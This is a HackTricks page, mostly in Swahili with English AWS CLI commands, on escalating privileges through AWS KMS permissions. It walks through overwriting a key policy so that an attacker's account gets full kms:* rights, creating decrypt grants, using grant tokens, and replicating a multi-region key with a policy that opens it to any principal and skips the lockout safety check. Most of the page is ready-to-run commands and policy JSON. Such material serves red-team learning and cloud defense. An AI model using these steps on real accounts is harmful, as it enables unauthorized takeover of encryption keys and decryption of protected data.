AWS - KMS Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

KMS

Kwa maelezo zaidi kuhusu KMS angalia:

AWS - KMS Enum

`kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)

Kwa ruhusa hizi inawezekana kubadilisha ruhusa za ufikiaji kwa funguo ili iweze kutumika na akaunti nyingine au hata mtu yeyote:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

`kms:CreateGrant`

Inaruhusu mwanahisa kutumia ufunguo wa KMS:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Grant inaweza kuruhusu aina fulani tu za operesheni: https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations

Kumbuka kwamba inaweza kuchukua dakika chache kwa KMS kuruhusu mtumiaji kutumia funguo baada ya grant kutengenezwa. Mara muda huo utakapopita, kiongozi anaweza kutumia funguo za KMS bila kuhitaji kubainisha chochote. Hata hivyo, ikiwa inahitajika kutumia grant mara moja tumia grant token (angalia msimbo ufuatao). Kwa maelezo zaidi soma hii.

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

Kumbuka kwamba inawezekana kuorodhesha ruhusa za funguo kwa:

aws kms list-grants --key-id <value>

`kms:CreateKey`, `kms:ReplicateKey`

Kwa ruhusa hizi inawezekana kuiga funguo ya KMS iliyo na uwezo wa mikoa mingi katika eneo tofauti na sera tofauti.

Hivyo, mshambuliaji anaweza kutumia hii kupata privesc ufikiaji wake kwa funguo na kuifanya kutumia.

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}